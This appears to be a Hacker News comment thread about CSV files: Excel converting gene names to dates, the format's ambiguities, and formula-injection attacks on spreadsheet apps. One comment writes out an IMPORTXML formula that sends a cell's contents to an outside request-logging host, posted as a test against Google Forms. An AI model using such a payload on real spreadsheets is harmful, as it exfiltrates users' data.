Interestingly, genetic biologists are probably more aware of this problem than most. When importing a CSV containing gene names such as SEPT2 or MARCH1, they automatically get converted to dates by Excel. This has potentially had a fairly large effect on research in the area [1]. One of the many reasons we insist on only using Ensembl IDs for genes at my company.
I noticed this in the data of some scientists I work with. Another awful thing is that when you tell them they need to format the column as text to prevent this in the future, before the data is put in the column (very important!), they'll eventually try to apply it to their existing fubar spreadsheets as well - in which case the "date-recognized" genes become ... large numbers representing the number of days since 1900, totally unrecognizable.
FWIW, I (not a biologist, though) only use LibreOffice for importing CSV these days. It allows me to look at the fields first and tell it if I want to suppress special treatment of data in a column.
EDIT: LibreOffice also allows you to tell it what encoding a file uses and what character(s) are used as separators.
Just curious, but what about non-vertebrates?
I'd have expected there to be an official number/hash that identifies genes like the InChI Key for chemistry or something. IIRC, that key in particular is just a SHA-256 of a long human-readable "chemical formula".
We'll cross that bridge when we come to it I guess, but we work almost exclusively with human and mouse genomes for now.
In any case, I imagine the Ensembl ID is still safer than other encodings in the case of invertebrates. For example, genes IDs in the Fruit fly genome look like FBgn0034730.
Slightly off-topic, but maybe we need a fully standardized and unambiguous CSV dialect with its own file extension. Or maybe just use SQLite tables or Parquet?
Some things I dislike about CSV:
* No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.
* I'm not a fan of the empty field. Pandas thinks it's a floating point NaN, while R doesn't. So is it a NaN? Is it an empty string? Does it mean Not Applicable? Does it mean Don't Know? Maybe it should be removed altogether.
* No agreement about escape characters.
* No agreement about separator characters.
* No agreement about line endings.
* No agreement about encoding. Is it ASCII, or UTF-8, or UTF-16, or Latin-whatever?
* None of the choices above are made explicit in the file itself. They all have the same extension "CSV".
These use up a bit of time whenever I get a CSV from a colleague, or even when I change operating system. Sometimes I end up clobbering the file itself.
Good things:
* Human readable.
* Simple.
I think the addition of some rules, and a standard interpretation of them, could go some way to improving the format.
See, one of the reasons CSV managed to get so ubiquitous is precisely because all those things are unspecified. CSV is not a popular format; CSV is the name we give 960 visually similar but very different formats that as a collective are popular.
The thing you use CSV for is not it's technical merit. You use CSV for its ubiquity. If you nailed down all those things you talk about, you would have a much, much smaller user base and there would be no reason to use CSV in the first place.
(Hey, this reminds me of a similar situation governing s/CSV/C/g...)
> No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.
I think this is more of an R-ism than a standardization issue. Strings are a pretty universal data type, where as categorical data (factors) are mostly specific to the domain of statistical modeling. IMO Python is doing the correct thing here. Personally I find factors to be more trouble than they are worth, and fortunately `data.table::fread` mimics Python in this regard.
Yes, through the "Import" feature. Excel will in that case allow you to choose what "type" each column in the CSV has (and will not parse text if given the "text" type). The problem is that a lot of users (myself included) will use muscle memory and double-click a CSV file in windows explorer rather than opening up Excel and initiating an import.
Because you can create documents with formulas, save them as CSV and open them again. If it did an import when opening, the operation save A -> load A would result in a different result than the file you had when you clicked saved.
or at least this the most logical explanation I could find.
Agree it is completely absurd to allow formulas in a CSV file, let alone code.
I have never seen a way to disable a full recalculation when Excel opens a CSV file, which beyond the security implications is painful for people like me who keep their calculations on manual because I often have very heavy workbooks opened all the time.
My first thought was this dead-simple solution: just pop up a prompt when opening CSVs. "Do you want to run formulas from this CSV file?" No need for complicated import wizards, just a simple yes/no.
Sure. I was just trying to come up with the simplest possible thing as a counter to the author's "it's too hard to fix vulnerabilities in existing spreadsheet programs" assertion. Microsoft and Google could probably bang out a dialog like that in a week if they were motivated.
Sorry to balk, but I'm more outraged at the title, another injection I need to talk about that isn't really the case. The root cause is the interpreter executing untrusted input, the same can be said about macros or any other file type. The perception being most people open CSV files on a regular basis and perceive them to be safe or not interpreted when it appears they are.
Well, it catches folks by surprise. We could abstract all computer vulns down to a few broad computing concepts, but that isn't as useful.
This one is your data turned out to be code. There are many, many books on all the various forms this takes. Memory corruption cat and mouse..... It is a long complex story that we can sweep up to that generalization. But it is important to know that high, medium, and low level of these issues. They form a gigantic tree. The medium level somewhere between is where devs need to threat model most of the time. But some of the time things are very specific and you just need to know about the specific thing and not it's various generalized forms, because the specific thing can really matter. E.g. simple programming mistakes lead to side channels, etc. We can generically understand a side channels easily. But it takes a ton of specific hard earned knowledge to avoid it.
It kind of is more useful to abstract them, so we're not whack-a-moling the current hype or hot title of the day and can focus on the fundamental issues.
I agree, it catches people off guard to think CSV files once interpreted can do more than give columns of information, but it's not an injection which is my beef.
You have to do both. When something unusual comes up it is good to file it away as a possibility. To be fair these have ways been "obvious" on pentests. When you start from the point of all input is dangerous, how can I abuse this one, it becomes the logical conclusion to put in an Excel formula. That is your point, I think. But my experience has told me some inputs are just assumed safe, even by developers that program defensively. So you have to embrace both IMO.
This seems like an appropriate place to suggest that anyone who finds these kinds of attack vectors interesting should check out the bug bounty program for my current place of work, which processes loads of CSV and Excel files from government customers.
(But please, just do me a small favor and don't submit any reports for SQL injection or information disclosure if you're using the SQL-like API that we expressly provide for the purpose of accessing public data. We get a couple clueless people sending such reports every week.)
This brings XSS to a whole new level. Imagine what happens if you know some of what you post in a website as a user eventually gets reviewed by somebody who gets it through a CSV dump.
Makes me wanna troll ops people at my own startup just for funsies.
this used to be common with txt files and IE's terrible practice of sniffing content. It would see a txt file that contained html and display the html instead, it could then pull in a secret silverlight file that was mascarading as a docx file as they are both simply zip files. Even more amusingly silverlight and docx contents don't clash so it could still be a valid docx file if you opened it, and the txt file would look like txt even though it was really rendering html with a hidden silverlight app.
Incase anyone else was wondering about Google Forms : I tried inputting =IMPORTXML(CONCAT("https://requestb.in/15z4vk51?f=",H8),"//a") into a text field and google automatically appends a "'" such that '=IMPORTXML does not execute
At least here (Italy) CSV is not commonly used (because of the different way we use the comma as a decimal point) and the default (in Excel) separator is then set to a semi-colon.
A more common format is TSV (TAB delimited) which makes a lot more sense, however the best choice when importing data in Excel is still to change the file extension to a non-recognized extension (like - say - .txt) and in the "import wizard" set the appropriate separator and set all columns as "text".
On the first attack vector: Google Security has a nice post about it [0] and why they do not consider it a valid threat. This is their reasoning:
>CSV files are just text files (the format is defined in RFC 4180) and evaluating formulas is a behavior of only a subset of the applications opening them - it's rather a side effect of the CSV format and not a vulnerability in our products which can export user-created CSVs. This issue should mitigated by the application which would be importing/interpreting data from an external source, as Microsoft Excel does (for example) by showing a warning. In other words, the proper fix should be applied when opening the CSV files, rather then when creating them.
Their policy makes it sound like that the second vulnerability should indeed be fixed in Google Sheets itself (it is the one opening the file, after all)
CSV is a mess (are a mess?), but all these vulnerabilities have to do with spreadsheet applications' consumption of CSVs. There are very legitimate reasons a CSV might include fragments of potentially executable code, after all.
Like it or not, Excel’s behavior defines the CSV file format and how it is used in the real world. The writing of an RFC 15 years too late has not and will never “fix” CSV. It’s crusted over over with bugs and inconsistencies for all time.
Use anything else, even XLSX which is at least a typed and openly standardized format.
When you import a CSV file into Google Sheets (File -> Import), you can choose in the dialog to convert text to numbers and dates. If you choose not to convert, Google Sheets places a single quote (') before the function.
My Excel 2010 doesn't execute shell code from author's example. Heck, it doesn't even parse CSV and loads everything into one column as text. What am I doing wrong?
As weird as it sounds, it might be related to your system region settings, specifically the decimal point sign and the thousands separator sign. I've been only able to open CSVs by manually importing them with Excel's 'import data from text file' function.
CSV is a pretty poor format in that it mixes the presentation and the underlying values. There is no standard for dates (dd/mm/yyyy or mm/dd/yyyy ?). The "standard" RFC4180 is extremely vague when discussing value interpretation. As proprietary as XLSX is, at least the Excel format separates the raw values from the presentation.
Except if your raw value begins with a "'". Or if it is 2017/10/10, or 10/10/2017, then it may be represented by an integer with a format of "date". Or if your raw value is 1234567890123456789, then you get a string like '1.23456789012345e18', complete with modified data. Or if it begins with an "=" which could result in basically anything as the article points out.
Excel conflates the idea of display format and data type which is the source of countless headaches. It is legacy pain in the purest form.
I'm going to interpret your comment as high praise. If you object to that interpretation, I'll dismiss your objection as just an argument over semantics. :)
>Unfortunately that’s not the end of the story. The character might not show up, but it is still there. A quick string length check with =LEN(D4) will confirm that.
The documented way is prefixing with a ' character. It doesn't have the length issue either.
As to the root issue, I can't think of any perfect way to transfer a series of values between applications that apply different types to those values and applications that don't. At some point, something is going to have to guess.